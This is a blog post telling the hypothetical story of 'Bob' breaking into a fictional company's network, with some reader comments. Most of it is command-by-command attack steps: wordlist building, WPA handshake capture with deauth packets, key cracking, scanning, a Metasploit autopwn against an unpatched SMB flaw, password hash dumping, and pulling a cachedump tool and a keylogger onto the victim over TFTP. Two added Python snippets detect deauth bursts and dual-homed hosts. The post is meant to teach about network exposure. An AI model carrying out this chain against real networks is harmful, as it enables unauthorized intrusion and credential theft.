Saturday, October 24, 2009

Bob's Double Penetration Adventure - Part 1

A couple of days ago a mate at work asked about the security issues surrounding computers that are connected to the company network and also to the Internet via a wifi connection. This question was perfect fodder for a Bob story, I thought. So the story goes...


Bob's a curious fella and he really likes to explore. Lately he's been learning about hacking, nothing evil, just really having a look in places that he shouldn't be looking, you know, a curiosity thing. As Bob sits at home it occurs to him that the perfect target for his hacking adventures is Walliford Fries, a chip maker based in his small town. He has nothing against Wallifords, he doesn't mean them any harm, he's just pissed off at the way the Wallifords are unloading their trucks at 5 in the morning and waking him up. So his intention is to see if he can get onto the Walliford network with some of these free hacking tools he's downloaded from the web and use Wallifords as his new playground.

Bob's not a traditional hacker. He doesn't go to the target's website and spend hours going through the detail, looking for business relationships, email addresses, job postings etc. He hasn't even started looking at IP ranges and ports. All Bob has done is fire up his laptop sporting a brand new install of BackTrack 4 and looked at what's about on the wifi.



That's interesting. Here he has a WPA network called WF-IT that is no doubt Walliford Fries related; after all, his house is within spitting distance of the Walliford offices. Shame it's not WEP though, that could be cracked in minutes. Now Bob knows that his best bet is to customise his wordlist for this particular target, so he decides to scrape Walliford's website and add all those words to his wordlist.

wget -r http://www.wallifordfries.com
wyd.pl -n -o /root/temp/WF-wordlist.txt /root/www.wallifordfries.com/

cat /root/temp/WF-wordlist.txt | sort | uniq > wordlist2.txt

cat wordlist2.txt | pw-inspector -m 1 -M 20 >WF-customlist.txt


After creating his custom wordlist Bob decides to add it to an existing wordlist. As he'll need to precompute a hash file from his wordlist to bruteforce the WPA key, he just opts for his small but popular password list. If this fails he'll have to go for the bigger wordlist he likes to call "Mother", but first he'll opt for the easy option.

cat WF-customlist.txt >> /root/temp/wordlist.txt

Bob now needs to get his wireless sniff on. He puts his wifi card into monitor mode and grabs the necessary BSSIDs of the access point and a client.

airmon-ng start wlan0 11

airodump-ng -c 11 mon0



With the BSSID of the client and the Access Point he starts his capture and saves it to a file.

airodump-ng -c 11 --bssid 00:18:F8:4B:43:86 -w /root/temp/Walliford mon0



With the capture going he sends a few deauth packets so he can capture the 4-way handshake. This is critical for him to perform his WPA crack.

aireplay-ng -0 1 -a 00:18:F8:4B:43:86 -c 00:11:50:BB:D6:28 mon0
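The deauthentication step above is also exactly what a wireless IDS looks for, so here is an added example (not code from the original post) of the detection side. It runs over constructed, already-decoded frame records (timestamp, frame type, subtype, source, destination) rather than raw pcap bytes, and flags any address pair that exchanges a burst of deauthentication frames inside a short window; the MAC addresses are the ones from the post, and the 0x0C subtype is the standard 802.11 deauthentication subtype.

```python
from collections import defaultdict

AP = "00:18:f8:4b:43:86"          # access point MAC from the post
CLIENT = "00:11:50:bb:d6:28"      # client MAC from the post
BCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sample traffic: (timestamp_s, type, subtype, src, dst).
# 802.11 management frames are type 0; subtype 12 (0x0C) is deauthentication.
SAMPLE_FRAMES = [
    (100.00, 0, 8,  AP, BCAST),        # beacon: normal background traffic
    (100.05, 2, 0,  CLIENT, AP),       # data frame: client is happily associated
    (100.20, 0, 12, AP, CLIENT),       # six "AP -> client" deauths in 50 ms
    (100.21, 0, 12, AP, CLIENT),
    (100.22, 0, 12, AP, CLIENT),
    (100.23, 0, 12, AP, CLIENT),
    (100.24, 0, 12, AP, CLIENT),
    (100.25, 0, 12, AP, CLIENT),
    (100.26, 0, 12, CLIENT, AP),       # spoofed reverse-direction deauths
    (100.27, 0, 12, CLIENT, AP),
    (100.28, 0, 12, CLIENT, AP),
    (101.50, 0, 0,  CLIENT, AP),       # client re-associates straight away
    (340.00, 0, 12, AP, "00:aa:bb:cc:dd:ee"),  # single deauth minutes later: benign
]


def find_deauth_bursts(frames, window=1.0, threshold=5):
    """Return (src, dst, count) for every address pair that sent at least
    `threshold` deauthentication frames within any `window`-second span.
    A real AP deauthenticates a client occasionally; dozens of deauths in
    well under a second, followed by an immediate re-association, is the
    signature of a forced handshake capture."""
    by_pair = defaultdict(list)
    for ts, ftype, subtype, src, dst in frames:
        if ftype == 0 and subtype == 12:
            by_pair[(src, dst)].append(ts)

    bursts = []
    for (src, dst), times in by_pair.items():
        times.sort()
        best, left = 0, 0
        for right in range(len(times)):        # sliding window over timestamps
            while times[right] - times[left] > window:
                left += 1
            best = max(best, right - left + 1)
        if best >= threshold:
            bursts.append((src, dst, best))
    return bursts


if __name__ == "__main__":
    for src, dst, count in find_deauth_bursts(SAMPLE_FRAMES):
        print(f"deauth burst: {count} frames {src} -> {dst}")
```

Because the attacking tool spoofs the AP's address, the burst shows up as coming from the AP itself; the tell is the rate, not the source.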



Great, Bob now has all he needs to begin his WPA crack. He quickly generates his hash file from the custom wordlist, hopefully all this effort will pay off.

To generate the hash he uses the genpmk tool from the cowpatty directory.

./genpmk -f /root/temp/wordlist.txt -d /root/temp/hash -s WF-IT

And to crack the key he uses cowpatty.

./cowpatty -r /root/temp/Walliford-01.cap -d /root/temp/hash -s WF-IT



Bingo! Bob got the WPA key in no time at all. He checks it by taking the card out of monitor mode and connecting to the AP.

airmon-ng stop mon0



Excellent, as soon as Bob finishes punching the air and doing his little dance he checks the wifi network for other hosts.

nmap 192.168.2.0/24 -sP



Got one, well two if you count the Linksys AP, but let's focus on the one using the Belkin card for now. Wondering what ports it has open, Bob puts Nmap to good use, again saving the results to a file.

nmap 192.168.2.102 -sV -oA ~/temp/wal-nmap



Bob's intention is to fire up Nessus and scan his target, but first he knows a quick way to check for a vulnerability that he already has a working exploit for.

nmap 192.168.2.102 -PN -T4 -p139,445 -n --script=smb-check-vulns --script-args=unsafe=1



Perfect, Nmap has told Bob that he should be able to exploit the remote PC with the conficker exploit. He can't believe that Walliford still has PCs unpatched for this vulnerability. I guess the guys from pauldotcom are right. They have a firewall and they have AV so they're safe, right? Wrong!

Bob confirms his findings with Nessus and checks for any other vulnerabilities that he might have some fun with.



Well, Nessus confirmed the vulnerability from his Nmap scan, which is good, but it doesn't find much else. Oh well, he saves his scan as an .nbe file so he can feed it into Metasploit.

After firing up Metasploit Bob decides to try out the db_autopwn feature to launch any exploits that it has against the ports it's found open.

db_create walliford
db_import_nessus_nbe /root/temp/walliford.nbe

db_hosts
db_autopwn -p -e -r -t




Oh, and time for another crazy dance: Bob gets a session on the remote host and he can see that he's got SYSTEM privileges, which is always nice. He dumps out the local users' hashes for some John the Ripper fun later and he checks out the route table. Superb, he can see that the remote host is also connected to the Walliford LAN.

sysinfo
getuid

hashdump
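The route table is the whole point of the story: the compromised PC sits on the wifi and on the corporate LAN at the same time. As an added example (not from the original post), this Python parses the "Active Routes" rows of Windows `route print` output and flags a host whose interfaces straddle the corporate range and some other network. The sample output, the 10.1.1.0/24 corporate range and the 10.1.1.57 address are constructed; 192.168.2.102 is the wifi address from the post.

```python
import ipaddress
import re

# Constructed sample of `route print` from a dual-homed XP-era box.
SAMPLE_ROUTE_PRINT = """\
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0      192.168.2.1   192.168.2.102     25
          0.0.0.0          0.0.0.0       10.1.1.254       10.1.1.57     20
        127.0.0.0        255.0.0.0        127.0.0.1       127.0.0.1      1
         10.1.1.0    255.255.255.0        10.1.1.57       10.1.1.57     20
      192.168.2.0    255.255.255.0    192.168.2.102   192.168.2.102     25
Default Gateway:        10.1.1.254
===========================================================================
"""

# destination, netmask, gateway, interface, metric
ROUTE_LINE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")


def parse_routes(route_print_output):
    """Return (network, gateway, interface_ip) for each active route row.
    Header and separator lines do not parse as addresses and are skipped;
    the gateway is kept as text so 'On-link' (Vista and later) still works."""
    routes = []
    for line in route_print_output.splitlines():
        m = ROUTE_LINE.match(line)
        if not m:
            continue
        dest, mask, gw, iface, _metric = m.groups()
        try:
            network = ipaddress.ip_network(f"{dest}/{mask}", strict=False)
            iface_ip = ipaddress.ip_address(iface)
        except ValueError:
            continue
        routes.append((network, gw, iface_ip))
    return routes


def classify_interfaces(routes, corporate_nets):
    """Map each non-loopback interface address to 'corporate' or 'other'."""
    nets = [ipaddress.ip_network(n) for n in corporate_nets]
    kinds = {}
    for _network, _gw, iface_ip in routes:
        if not iface_ip.is_loopback:
            kinds[str(iface_ip)] = "corporate" if any(iface_ip in n for n in nets) else "other"
    return kinds


def is_bridging_host(route_print_output, corporate_nets):
    """True when the host has a foot on the corporate LAN and on a network the
    company does not control: the PC-IT-1 situation, where wifi reaches the LAN."""
    kinds = set(classify_interfaces(parse_routes(route_print_output), corporate_nets).values())
    return kinds == {"corporate", "other"}
```

Run the same check from an inventory or login script and a dual-homed machine shows up before someone like Bob finds it.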




At this point Bob decides to get a little interactive, so he pulls up a command prompt on the compromised host.

execute -H -f cmd.exe -i

He TFTPs a couple of handy dandy files from his laptop and grabs the hashes of any domain accounts that have logged into this box. With a hostname such as PC-IT-1 he guesses these are going to be quite useful for his exploration adventures in his new playground.

tftp -i 192.168.2.101 get cachedump.exe
tftp -i 192.168.2.101 get klogger.exe

cachedump.exe




Now he decides to have a little look around on the server. He maps a drive to the IT folder and attempts to have a poke around.

net view \\server01
net use * \\server01\IT




Damn. The NTFS permissions won't allow him access. Then it dawns on him: the SYSTEM account he is using doesn't have permissions on the server. Maybe not, but with a hostname like PC-IT-1 the logged-in user probably will have. He comes out of his session, lists the processes and then migrates to a process which is running in the context of the user.

quit
ps
getuid

migrate 784

getuid




Perfect, he's migrated to the Explorer.exe process and now he's running as James. Bob launches an interactive shell again and checks his mapped drives.

execute -H -f cmd.exe -i
net use

I:




Brilliant. Bob's got access to the IT folder. From here he can have a good poke around before he decides his next move. He's got some good old fashioned password cracking to do and time's getting on, so Bob decides to call it a day for now.

7 comments:

STRSHR said...

Meterpreter has got an 'upload' command for file transfers through the meterpreter session so the tftp part is just plain unnecessary.

SynJunkie said...

So it has. I guess because Bob was sitting at a command prompt at the time he thought TFTP seemed like an easier option, and Bob's all about the easy!

TAPE said...

Lovely post !

I always thoroughly enjoy your hypothetical stories :)

Nice work, looking forward to part II !

Andy said...

Another great article! I've been waiting for the next one of these :)

Quick question, do you think it would be faster for Bob to run his password lists through Aircrack-ng? Or is creating the hash lookup table and running cowpatty against that faster?

thanks

Andy

g3k said...

Nice article yet again. I appreciate your hard work!

SynJunkie said...

Hey thanks for the feedback guys.

Andy - Not sure about your Aircrack-ng question. If I get chance at the weekend I'll look into it, err I mean I'll ask Bob to look into it ;-)

Cheers

Syn

Andy said...

Excellent ;)

Looking forward to part 2!

Andy